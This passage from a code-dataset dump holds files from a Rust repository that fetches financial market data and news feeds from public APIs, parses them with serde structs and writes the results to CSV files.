serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ChartData {\n pub symbol: String,\n pub company: String,\n pub time_as_of: String,\n pub is_nasdaq100: bool,\n pub last_sale_price: String,\n pub net_change: String,\n pub percentage_change: String,\n pub delta_indicator: String,\n pub previous_close: String,\n pub chart: Vec<Chart>,\n pub events: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Chart {\n pub z: gen::DateVal,\n pub x: i64,\n pub y: f64,\n}\n\n\npub const NDAQ_CHART_HEADER: [&'static str; 3] = [\n \"symbol\",\n \"t\",\n \"x\",\n];\n\n" }, { "alpha_fraction": 0.46086955070495605, "alphanum_fraction": 0.678260862827301, "avg_line_length": 27.75, "blob_id": "93eec8e05f435863351b40489a42da117abc473a", "content_id": "de20bd1c4eeb01bccc24a78b2dd33680a57d0753", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 115, "license_type": "no_license", "max_line_length": 45, "num_lines": 4, "path": "/SipFin/Project.toml", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "name = \"SipFin\"\nuuid = \"70013b41-fe71-44ed-a28c-513d48e90f39\"\nauthors = [\"anandijain <[email protected]>\"]\nversion = \"0.1.0\"\n" }, { "alpha_fraction": 0.6349302530288696, "alphanum_fraction": 0.6446331143379211, "avg_line_length": 30.11320686340332, "blob_id": "aec03b774d761099d6c37534c735c291e98fd9b0", "content_id": "c31df65263d4a772cc8f39d794219e427f333ae6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1649, "license_type": "no_license", "max_line_length": 116, "num_lines": 53, "path": "/finox/src/news/sa.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate 
serde_json;\n\n/*\nhttps://finance.api.seekingalpha.com/v2/real-time-prices?symbols%5B%5D=GOOG\nhttps://seekingalpha.com/tooltips/get\nhttps://seekingalpha.com/news/trending_news\nhttps://seekingalpha.com/symbol/AAPL/financials-data?period_type=quarter&statement_type=income-statement&is_pro=true\nhttps://seekingalpha.com/account/ajax_get_comments?id=4337864&type=Article\n*/\n\n// https://seekingalpha.com/get_trending_articles\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct SARoot {\n pub list: Vec<List>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct List {\n pub id: i64,\n pub path: String,\n pub title: String,\n pub slug: Option<String>,\n pub company_name: Option<String>,\n pub author_picture: String,\n pub author_name: ::serde_json::Value,\n pub publish_on: i64,\n pub comments_counts: String,\n pub author_user_id: i64,\n}\n\nimpl crate::HasRecs for SARoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.list.iter().map(|x| x.to_rec()).collect()\n }\n}\n\nimpl List{\n pub fn to_rec(&self) -> Vec<String> {\n vec![ \n self.id.to_string(),\n self.author_user_id.to_string(),\n self.publish_on.to_string(),\n self.title.replace(\",\", \";\").to_string(),\n self.slug.clone().unwrap_or(\"\".to_string()).to_string(),\n self.comments_counts.to_string(),\n self.author_name.to_string().replace(\",\", \";\"),\n self.path.to_string(),\n ]\n }\n}\n" }, { "alpha_fraction": 0.586056649684906, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 17.31999969482422, "blob_id": "ac19c23d46bcdd537d60798a4d8665f4695a4e65", "content_id": "cf85c45839b75c0520358c1ed8404cf8b8790300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 459, "license_type": "no_license", "max_line_length": 169, "num_lines": 25, "path": "/tables.sql", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "/*\nschemas\n\n*/\n\ncreate table rt(\n\tsymbol varchar(16),\n\tt timestamp, \n\tx float,\n\tv int\n);\n\ncreate table fred(\n\tt date,\n\tx float,\n\tid varchar(32)\n);\n\n/*\nqueries\n\n*/\nselect a.id, a.t, a.x, b.id, b.t, b.x from fred a inner join fred b on a.t = b.t where b.id = 'DGS3MO' and a.id = 'DPRIME';\n\nselect a.t, a.x x1, b.x x2, c.x x3 from fred a inner join fred b on a.t = b.t inner join fred c on b.t = c.t where a.id = 'DPRIME' and b.id = 'DGS3MO' and c.id = 'DTB6';\n\n" }, { "alpha_fraction": 0.6741573214530945, "alphanum_fraction": 0.6741573214530945, "avg_line_length": 11.714285850524902, "blob_id": "039044d13a7a784774a8dc094a1e3e5386017940", "content_id": "e84f24a3644a657c1093e073b4cedf68a7c6df02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/README.md", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "# sipfin\n\n\n## todo \n* roses -> finox\n* general slash trash\n* bare minimum tests and docs\n" }, { "alpha_fraction": 0.6097031235694885, "alphanum_fraction": 0.6140477657318115, "avg_line_length": 29, "blob_id": "0be24dd61f23931e5b7605cb15b654196fbc5003", "content_id": "38cead9c2a29f786ebdeb65a4c987be2c9a97872", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 95, "num_lines": 46, "path": "/finox/src/news/jpxnews.rs", "repo_name": 
"adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n// https://www.jpx.co.jp/english/news/news_ym_01.json\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"snake_case\")]\npub struct Root {\n pub kind: String,\n pub category: Vec<String>,\n pub corporation: Vec<String>,\n pub ir_category: Vec<String>,\n pub product_category: Vec<String>,\n pub title: String,\n pub url: String,\n pub updated_date: JPXUpdatedDate,\n pub display_type: String,\n pub external_flg: Vec<String>,\n pub extension_icon: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct JPXUpdatedDate {\n pub year: String,\n pub month: String,\n pub day: String,\n}\n\nimpl Root {\n pub fn to_rec(&self) -> Vec<String> {\n let ret: Vec<String> = vec![\n self.kind.to_string(),\n self.category[0].to_string(),\n self.corporation[0].to_string(),\n self.ir_category[0].to_string(),\n self.product_category[0].to_string(),\n self.title.replace(\",\", \" \"),\n self.url.to_string(),\n self.updated_date.year.to_string(),\n self.updated_date.month.to_string(),\n self.updated_date.day.to_string(),\n ];\n return ret;\n }\n}\n\n" }, { "alpha_fraction": 0.4733441174030304, "alphanum_fraction": 0.47859451174736023, "avg_line_length": 35.411766052246094, "blob_id": "b345498657e82a7d0f44c797ae9019dcb4b79971", "content_id": "ecc3fed08686b491edc4e006bc89c625839a25cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2476, "license_type": "no_license", "max_line_length": 89, "num_lines": 68, "path": "/finox/src/bin/sec.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "//#![deny(warnings)]\nextern crate regex;\nextern crate reqwest;\nextern crate serde;\nextern crate tokio;\nuse finox::{roses, sec};\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn std::error::Error>> {\n let index = roses::read_into::<sec::SecIndex>(\"../ref_data/sec13f.csv\").unwrap();\n let urls: Vec<String> = index\n .iter()\n .map(|x| format!(\"https://sec.gov/Archives/{}\", x.filename))\n .collect();\n let headers = finox::fetch_strings(urls.to_vec()).await;\n println!(\"{:#?}\", headers);\n Ok(())\n}\n\n//pub fn cik_to_url(s: &str) -> String {\n// format!(\"https://sec.report/CIK/{}\", s)\n//}\n//\n//pub fn nresults(textrsp: &str) -> Option<u64> {\n// let sel = Selector::parse(\"small\").unwrap();\n// let doc = Html::parse_document(&textrsp);\n// // docs on current page\n// //let docs_sel = Selector::parse(\"\");\n// // num pages\n// for n in doc.select(&sel) {\n// let text = n.text().collect::<Vec<_>>();\n// for txtelt in text.iter() {\n// if txtelt.contains(&\"Results\") {\n// let split_txt: Vec<&str> = txtelt.split(' ').collect();\n// let num_filings = split_txt[2];\n// let num_pages: f64 = num_filings.parse::<f64>().unwrap() / 50.;\n// let np_int = num_pages.ceil() as u64;\n// return Some(np_int);\n// }\n// }\n// }\n// return None;\n//}\n//pub fn cik_docs(textrsp: &str) -> Option<Vec<String>> {\n// let sel = Selector::parse(\"div\").unwrap();\n// let a_tags = Selector::parse(\"a\").unwrap();\n// let trows = Selector::parse(\"tr\").unwrap();\n// let doc = Html::parse_document(&textrsp);\n// let mut hrefs = vec![];\n// for (i, div) in doc.select(&sel).enumerate() {\n// if let Some(\"documents\") = div.value().attr(\"id\") {\n// println!(\"{}: {:#?}\", i, 
div.value());\n// for (_j, divbody) in div.select(&sel).enumerate() {\n// if let Some(\"panel-body\") = divbody.value().attr(\"class\") {\n// for (j, tr) in div.select(&trows).enumerate() {\n// for a_tag in tr.select(&a_tags) {\n// let href = a_tag.value().attr(\"href\").unwrap().to_string();\n// println!(\"{} {}: {:#?}\", i, j, href);\n// hrefs.push(href);\n// }\n// }\n// }\n// }\n// }\n// }\n//\n// return Some(hrefs);\n//}\n" }, { "alpha_fraction": 0.6206563711166382, "alphanum_fraction": 0.623552143573761, "avg_line_length": 26.626667022705078, "blob_id": "fc394e4f3e62e78ce3706253b6d5be35166ccbd9", "content_id": "12c0633d7379fbaa885e4692c7ad67edd3864431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2072, "license_type": "no_license", "max_line_length": 95, "num_lines": 75, "path": "/finox/src/news/gs.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n// https://www.goldmansachs.com/insights/insights-articles.json\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub items: Vec<GSItem>,\n pub articles: Vec<GSArticle>,\n}\n\nimpl crate::HasRecs for Root {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.articles.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct GSItem {\n pub description: String,\n pub title: String,\n pub node_id: i64,\n pub url: String,\n pub featured_articles: Option<Vec<GSArticle>>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct GSArticle {\n pub has_video: bool,\n pub date: Option<String>,\n pub has_audio: bool,\n pub topics: Option<Vec<GSTopic>>,\n pub image_url: Option<String>,\n pub description: String,\n pub title: String,\n pub node_id: i64,\n pub url: String,\n pub series: Option<GSTopic>,\n}\n\nimpl GSArticle {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.node_id.to_string(),\n self.date.clone().unwrap_or(\"\".to_string()),\n self.title.to_string(),\n self.description.to_string(),\n self.has_video.to_string(),\n self.has_audio.to_string(),\n ];\n //rec.append(&mut lilmatcher_gstopic(self.series.clone()));\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct GSTopic {\n pub title: String,\n pub node_id: i64,\n pub url: String,\n}\n\nimpl GSTopic {\n pub fn to_rec(&self) -> Vec<String> {\n vec![\n self.title.to_string(),\n self.node_id.to_string(),\n self.url.to_string(),\n ]\n }\n}\n" }, { "alpha_fraction": 0.5111982226371765, "alphanum_fraction": 0.5375139713287354, "avg_line_length": 30.89285659790039, "blob_id": "c5bb7d5401cd9e1d3420d50a2815f462e96f067b", "content_id": "9c8e2c8e3f7326897d45f772744bfdf1754c3345", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1786, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/finox/src/bin/rt.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate chrono;\nextern crate reqwest;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nextern crate 
tokio;\n\nuse chrono::{prelude::*, Timelike, Utc};\n\nuse std::{collections::HashMap, env, thread, time::Duration};\n\n#[tokio::main]\nasync fn main() -> Result<(), String> {\n    let args = env::args().collect::<Vec<String>>();\n    let debug = args.len() > 1;\n    let filepath = \"../ref_data/tickers_stocks.txt\";\n    let tickers = finox::roses::read_tickers(filepath);\n    let mut hm = HashMap::new();\n    for symb in tickers.iter() {\n        hm.insert(\n            finox::Security::Stock(symb.to_string()),\n            FixedOffset::east(5 * 3600).ymd(1970, 1, 1).and_hms(0, 1, 1),\n        );\n    }\n\n    let mut i: usize = 0;\n    loop {\n        let dt = Utc::now();\n        i += 1;\n\n        let s = dt.num_seconds_from_midnight();\n        // fix this spaghetti\n        if !debug && s < 13 * 3600 + 30 * 60 {\n            println!(\"premarket {:?}\\n\", dt.timestamp());\n            thread::sleep(Duration::from_secs(10));\n        } else if !debug && s > 20 * 3600 {\n            println!(\"market is closed {:?}\\n\", dt.timestamp());\n            thread::sleep(Duration::from_secs(100));\n        } else {\n            println!(\"{}: market is open {:?}\", i, dt.to_rfc3339());\n\n            hm = finox::fetch_rt(hm).await;\n\n            println!(\"hashmap {:#?}\", hm);\n        }\n    }\n    //Ok(())\n}\n\n//match args[2].as_str() {\n//    \"realtime-trades\" => nasdaq_o2::lil_fetchvv_rt(urls).await,\n//    \"chart\" => nasdaq_o2::lil_fetchvv_chart(urls).await,\n//    \"option-chain\" => nasdaq_o2::lil_fetchvv_oc(urls).await,\n//    \"info\" => nasdaq_o2::lil_fetchv(urls).await,\n//    _ => panic!(\"todo, make fetch generic over <T>\"),\n//    };\n" }, { "alpha_fraction": 0.5792728662490845, "alphanum_fraction": 0.5927661061286926, "avg_line_length": 30.3764705657959, "blob_id": "71bb8393c43615f3bc40d6207d62593d4da02c23", "content_id": "48b36957d4da22c1912af04b8a8ad0cf2cbd83fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5336, "license_type": "no_license", "max_line_length": 141, "num_lines": 170, "path": "/finox/src/yf.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n/*\nhttps://query1.finance.yahoo.com/v7/finance/spark?symbols=%5EGSPC&range=1d\nhttps://query1.finance.yahoo.com/v7/finance/spark?symbols=BTCUSD%3DX&range=1d\nhttps://query1.finance.yahoo.com/v1/finance/screener/instrument/earnings/fields?lang=en-US&region=US&category=keystats%2Cfinancials\nhttps://query1.finance.yahoo.com/v8/finance/chart/AAPL?region=US&range=1d\nhttps://query1.finance.yahoo.com/v8/finance/chart/USDEUR=X?symbol=USDEUR%3DX&range=1d&interval=1m\nhttps://query2.finance.yahoo.com/ws/insights/v2/finance/insights?region=US&symbol=MSFT\n\nhttps://finance.yahoo.com/_finance_doubledown/api/resource/YFinLists;count=3;listIds=%5B%22commodities%22%2C%22currencies%22%2C%22bonds%22%5D\n*/\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct YFRoot {\n    pub chart: Chart,\n}\n\nimpl crate::HasRecs for YFRoot {\n    fn to_recs(&self) -> Vec<Vec<String>> {\n        let mut ret: Vec<Vec<String>> = Vec::new();\n        let ts = &self.chart.result[0].timestamp;\n        let meta = &self.chart.result[0].meta;\n        if let Some(quote) = &self.chart.result[0].indicators.quote[0] {\n            for i in 0..ts.len() {\n                let mut rec: Vec<String> = vec![meta.symbol.to_string()]; //Vec::new();\n                if let Some(ohlcv) = Quote::to_rec(quote, i) {\n                    //rec.push(self.chart.result[0].meta.symbol.to_string());\n                    rec.push(ts[i].to_string());\n                    rec.append(&mut ohlcv.clone());\n                    ret.push(rec);\n                }\n            }\n        }\n
        return ret;\n    }\n}\n\nimpl YFRoot {\n    pub fn meta_record(&self) -> Vec<String> {\n        let rec = Meta::to_rec(&self.chart.result[0].meta);\n        return rec;\n    }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Chart {\n    pub result: Vec<YFResult>,\n    pub error: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct YFResult {\n    pub meta: Meta,\n    pub timestamp: Vec<i64>,\n    pub indicators: Indicators,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Meta {\n    pub currency: String,\n    pub symbol: String,\n    pub exchange_name: String,\n    pub instrument_type: String,\n    pub first_trade_date: i64,\n    pub regular_market_time: i64,\n    pub gmtoffset: i64,\n    pub timezone: String,\n    pub exchange_timezone_name: String,\n    pub regular_market_price: f64,\n    pub chart_previous_close: f64,\n    pub price_hint: i64,\n    pub current_trading_period: ::serde_json::Value,\n    pub data_granularity: String,\n    pub range: String,\n    pub valid_ranges: Vec<String>,\n}\n\nimpl Meta {\n    pub fn to_rec(&self) -> Vec<String> {\n        let rec: Vec<String> = vec![\n            self.symbol.to_string(),\n            self.exchange_name.to_string(),\n            self.instrument_type.to_string(),\n            self.currency.to_string(),\n            self.first_trade_date.to_string(),\n            self.regular_market_time.to_string(),\n            self.gmtoffset.to_string(),\n            self.timezone.to_string(),\n            self.exchange_timezone_name.to_string(),\n        ];\n        return rec;\n    }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Indicators {\n    pub quote: Vec<Option<Quote>>,\n    pub adjclose: Option<::serde_json::Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Quote {\n    // todo option<vec<option<f64>>>\n    pub open: Vec<Option<f64>>,\n    pub close: Vec<Option<f64>>,\n    pub volume: Vec<Option<i64>>,\n    pub low: Vec<Option<f64>>,\n    pub high: Vec<Option<f64>>,\n}\n//??\nimpl crate::HasRecs for Quote {\n    fn to_recs(&self) -> Vec<Vec<String>> {\n        let mut ret: Vec<Vec<String>> = Vec::new();\n        for i in 0..self.high.len() {\n            if let Some(rec) = Quote::to_rec(self, i) {\n                ret.push(rec);\n            }\n        }\n        return ret;\n    }\n}\n\n// TODO refac\nimpl Quote {\n    pub fn to_rec(&self, i: usize) -> Option<Vec<String>> {\n        let mut rec: Vec<String> = Vec::new();\n        if let Some(op) = self.open[i] {\n            rec.push(op.to_string());\n        } else {\n            rec.push(\"\".to_string());\n        }\n\n        if let Some(hi) = self.high[i] {\n            rec.push(hi.to_string());\n        } else {\n            rec.push(\"\".to_string());\n        }\n\n        if let Some(lo) = self.low[i] {\n            rec.push(lo.to_string());\n        } else {\n            rec.push(\"\".to_string());\n        }\n\n        if let Some(close) = self.close[i] {\n            rec.push(close.to_string());\n        } else {\n            rec.push(\"\".to_string());\n        }\n\n        if let Some(vol) = self.volume[i] {\n            rec.push(vol.to_string());\n        } else {\n            rec.push(\"\".to_string());\n        }\n        return Some(rec);\n    }\n}\n" }, { "alpha_fraction": 0.5662506222724915, "alphanum_fraction": 0.574411928653717, "avg_line_length": 39.843135833740234, "blob_id": "f551504b10b946f529fce3888e31966ec1cb4bbf", "content_id": "d7b976f62d9975b74ca8dbeeb6382c1a2b283a0d", "detected_licenses": [], "is_generated": false, "is_vendor": false,
"language": "Rust", "length_bytes": 4166, "license_type": "no_license", "max_line_length": 166, "num_lines": 102, "path": "/finox/src/bin/news.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse finox::roses;\nuse std::path::Path;\n\n#[tokio::main]\npub async fn main() {\n    // utils::nytarchive();\n\n    //finox::nytfeed()?;\n    //finox::gsnews()?;\n    //guardian_news().await?;\n    // TODO: do async and collect HashMap<String, Vec<Vec<String>>>\n    if let Ok(recs) =\n        finox::fetch::<finox::news::guardian::ArticleRoot>(vec![urlfmt(\"search\")]).await\n    {\n        println!(\"{:#?}\", recs);\n        let file_name = format!(\n            \"../data/news/guardian_{}.csv\",\n            chrono::Utc::now().to_rfc3339()\n        );\n        let file_path = Path::new(&file_name);\n        roses::write_csv(file_path, recs, &finox::headers::GUARDIAN_HEADER).expect(\"csv prob\");\n    }\n\n    let nyt_url = format!(\n        \"https://api.nytimes.com/svc/news/v3/content/all/all.json?api-key={}&limit=200\",\n        finox::keys::NYT_KEY.to_string()\n    );\n\n    if let Ok(recs) = finox::fetch::<finox::news::nyt::NYTFeed>(vec![nyt_url]).await {\n        //println!(\"{:#?}\", recs);\n        let file_name = format!(\"../data/news/nyt_{}.csv\", chrono::Utc::now().to_rfc3339());\n        let file_path = Path::new(&file_name);\n        roses::write_csv(file_path, recs, &finox::headers::NYT_FEED_HEADER).expect(\"csv prob\");\n    }\n\n    // jpx won't work because root is a vec, prob a flatten fix\n    //let jpx_url = \"https://www.jpx.co.jp/english/news/news_ym_01.json\";\n\n    //if let Ok(recs) = finox::fetch::<finox::news::jpxnews::JPX>(vec![jpx_url]).await {\n    //    println!(\"{:#?}\", recs);\n    //}\n    let wsj_url = \"https://video-api.wsj.com/api-video/find_all_videos.asp\".to_string();\n    if let Ok(recs) = finox::fetch::<finox::news::wsj::WSJRoot>(vec![wsj_url]).await {\n        //println!(\"{:#?}\", recs);\n        let file_name = format!(\"../data/news/wsj_{}.csv\", chrono::Utc::now().to_rfc3339());\n        let file_path = Path::new(&file_name);\n        roses::write_csv(file_path, recs, &finox::headers::WSJ_HEADER).expect(\"csv prob\");\n    }\n\n    let gs_url = \"https://www.goldmansachs.com/insights/insights-articles.json\";\n    if let Ok(recs) = finox::fetch::<finox::news::gs::Root>(vec![gs_url.to_string()]).await {\n        println!(\"goldman {:#?}\", recs);\n        let file_name = format!(\"../data/news/gs_{}.csv\", chrono::Utc::now().to_rfc3339());\n        let file_path = Path::new(&file_name);\n\n        roses::write_csv(file_path, recs, &finox::headers::GS_HEADER).expect(\"csv problem\");\n    }\n\n    let moodys_url = \"https://www.moodys.com/_layouts/mdc/am/Request/request.php?profile=homepage\";\n    if let Ok(recs) = finox::fetch::<finox::news::moodys::Root>(vec![moodys_url.to_string()]).await\n    {\n        println!(\"moodys {:#?}\", recs);\n        let file_name = format!(\n            \"../data/news/moodys_{}.csv\",\n            chrono::Utc::now().to_rfc3339()\n        );\n        let file_path = Path::new(&file_name);\n\n        roses::write_csv(file_path, recs, &finox::headers::MOODYS_HEADER).expect(\"csv problem\");\n    }\n\n    // TODO fix, serializing err\n    //let sa_url = \"https://seekingalpha.com/get_trending_articles\".to_string();\n\n    //if let Ok(recs) = finox::fetch::<finox::news::sa::SARoot>(vec![sa_url]).await {\n    //    println!(\"{:#?}\", recs);\n    //    let file_name = format!(\"../data/news/sa_{}.csv\", chrono::Utc::now().to_rfc3339());\n    //    let file_path = Path::new(&file_name);\n    //    roses::write_csv(file_path, recs, &finox::headers::SA_HEADER).expect(\"csv prob\");\n    //}\n    
//bloomberg::news();\n}\n\n//pub async fn fetch_write_blocking<T: finox::HasRecs>(urls: Vec<String>) -> Result<(), csv::Error> {\n// if let Ok(recs) = finox::fetch::<T>(urls).await {\n// println!(\"{:#?}\", recs);\n// let file_name = format!(\"../data/news/wsj_{}.csv\", chrono::Utc::now().to_rfc3339());\n// let file_path = Path::new(&file_name);\n// roses::write_csv(file_path, recs, &finox::headers::WSJ_HEADER).expect(\"csv prob\");\n// }\n//}\n\npub fn urlfmt(s: &str) -> String {\n format!(\n \"https://content.guardianapis.com/{}?api-key={}\",\n s,\n finox::keys::GUARDIAN_KEY\n )\n}\n" }, { "alpha_fraction": 0.5539972186088562, "alphanum_fraction": 0.5666199326515198, "avg_line_length": 30, "blob_id": "7795e149372a12d81615f60d37a6685de64492db", "content_id": "f31892f306881c26ec6fa0d3fdb73d412ee0c57c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 713, "license_type": "no_license", "max_line_length": 91, "num_lines": 23, "path": "/finox/src/bin/cme.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate chrono;\nextern crate reqwest;\nextern crate tokio;\n\nuse std::path::Path;\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn std::error::Error>> {\n let mut urls = vec![];\n let root = \"https://www.cmegroup.com/CmeWS/mvc/Quotes/Future/\";\n for i in 1..1000 {\n urls.push(format!(\"{}{}/G\", root, i));\n }\n\n if let Ok(recs) = finox::fetch::<finox::cme::CMERoot>(urls).await {\n println!(\"{:#?}\", recs);\n let file_name = format!(\"../data/cme/cme_{}.csv\", chrono::Utc::now().to_rfc3339());\n let file_path = Path::new(&file_name);\n finox::roses::write_csv(file_path, recs, &finox::headers::CME_QUOTE_HEADER)\n .expect(\"csv prob\");\n }\n Ok(())\n}\n" }, { "alpha_fraction": 0.6121541261672974, "alphanum_fraction": 0.6126482486724854, "avg_line_length": 26.351350784301758, "blob_id": "bfbec5910e87fb4f2f6b048d2b3851982497642e", "content_id": "7de706542c00da8a521f9fbc7351d9aea7b496f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2024, "license_type": "no_license", "max_line_length": 95, "num_lines": 74, "path": "/finox/src/nasdaq/dividends.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DividendsRoot {\n pub data: DividendData,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRecs for DividendsRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self\n .data\n .dividends\n .rows\n .iter()\n .map(|c| c.to_rec())\n .collect();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DividendData {\n pub ex_dividend_date: String,\n pub dividend_payment_date: String,\n #[serde(rename = \"yield\")]\n pub yield_field: String,\n pub annualized_dividend: String,\n pub payout_ratio: String,\n pub dividends: HeadersRows,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct HeadersRows {\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub 
ex_or_eff_date: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub amount: String,\n pub declaration_date: String,\n pub record_date: String,\n pub payment_date: String,\n}\n\nimpl Row {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.ex_or_eff_date.to_string(),\n self.type_field.to_string(),\n self.amount.to_string(),\n self.declaration_date.to_string(),\n self.record_date.to_string(),\n self.payment_date.to_string(),\n ];\n }\n}\n\npub const NDAQ_DIVIDEND_HEADER: [&'static str; 6] = [\n \"ex_or_eff_date\",\n \"type_field\",\n \"amount\",\n \"declaration_date\",\n \"record_date\",\n \"payment_date\",\n];\n" }, { "alpha_fraction": 0.6139534711837769, "alphanum_fraction": 0.6156976819038391, "avg_line_length": 28.152542114257812, "blob_id": "76836fdb89e321c9aaca0f416d69cb0dc5f208e4", "content_id": "f476cd65915db292d956d310a3b5c4c99332b7dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1720, "license_type": "no_license", "max_line_length": 105, "num_lines": 59, "path": "/finox/src/news/tr.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "// https://sope.prod.reuters.tv/program/rcom/v1/article-recirc?edition=cn&modules=rightrail,ribbon,bottom\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TRRoot {\n pub rightrail: TRRibbon,\n pub ribbon: TRRibbon,\n pub bottom: TRRibbon,\n}\n\nimpl crate::HasRecs for TRRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for list in [&self.rightrail, &self.ribbon, &self.bottom].iter() {\n recs.append(&mut list.to_recs());\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TRRibbon {\n #[serde(rename = \"ab_test\")]\n pub ab_test: Vec<::serde_json::Value>,\n pub errors: Vec<::serde_json::Value>,\n pub stories: Vec<TRStory>,\n pub tags: Vec<String>,\n}\n\nimpl crate::HasRecs for TRRibbon {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.stories.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = 